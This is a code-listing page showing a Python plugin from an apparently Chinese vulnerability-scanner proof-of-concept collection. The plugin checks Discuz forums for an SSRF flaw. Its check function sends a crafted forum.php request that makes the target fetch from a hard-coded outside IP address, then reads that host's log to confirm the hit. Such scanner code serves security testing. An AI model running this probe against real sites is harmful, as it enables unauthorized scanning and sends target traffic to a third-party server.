• Search by Module
• Search by Words
• Search Projects

• Java
• Python
• JavaScript
• TypeScript
• C++
• Scala
• Blog

• xunfeng_vul_poc-master
  • discuz_SSRF.py
  • NginxCVE-2017-7529.py
  • libssh_unauth.py
  • LICENSE
  • Drupal_CVE_2019_6340RCE.py
  • DiscuzX1.5X2.5X3_uc_key_getshell.py
  • ThinkPHP-3.X-5.X-orderby-sql.py
  • ms17010.py
  • README.md
  • .gitignore
  • st2-057eval.py
  • Elasticsearch_groovy_RCE.py
  • thinkphpCodeEXE.py

# coding=utf-8
import time
import hashlib
import datetime
import requests


def get_plugin_info():
    plugin_info = {
        "name": "Discuz SSRF漏洞",
        "info": "Discuz论坛forum.php参数message SSRF漏洞,trs infogate插件 blind XML实体注入",
        "level": "中危",
        "type": "SSRF",
        "author": "muYoz@bg",
        "url": "https://github.com/Lucifer1993/AngelSword/blob/master/cms/discuz/discuz_forum_message_ssrf.py",
        "keyword": "tag:php",
        "source": 1
    }
    return plugin_info

def check(ip, port, timeout=10):
    url = ip + ':' + port
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
    }
    time_stamp = time.mktime(datetime.datetime.now().timetuple())
    m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
    md5_str = m.hexdigest()
    payload = "/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://45.76.158.91:6868/" + md5_str + ".jpg[/img]&formhash=09cec465"
    vulnurl = url + payload
    try:
        req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
        eye_url = "http://45.76.158.91/web.log"
        time.sleep(6)
        reqr = requests.get(eye_url, timeout=timeout, verify=False)
        if md5_str in reqr.text:
            return u"存在discuz论坛forum.php参数message SSRF漏洞"
    except:
        pass